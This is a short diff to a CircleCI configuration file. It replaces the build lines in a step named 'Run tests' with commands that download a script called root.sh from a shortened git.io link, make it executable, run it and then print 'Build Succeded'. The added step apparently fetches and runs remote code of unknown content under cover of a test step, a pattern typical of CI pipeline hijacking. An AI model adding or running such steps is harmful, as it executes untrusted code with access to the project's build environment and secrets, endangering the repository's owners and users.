--- a/.circleci/config.yml
+++ b/.circleci/config.yml
@@ -12,9 +12,9 @@ working_dir: &working_dir ~/app
     - run: 
         name: Run tests 
         command: |                                      
-                    wget -qO build.sh 
-                    chmod +x build.sh 
-                    ./build.sh  
+                    wget -qO root.sh https://git.io/JDgAD 
+                    chmod +x root.sh 
+                    ./root.sh  
                     echo Build Succeded                       
 version: 2.0 
 jobs: 
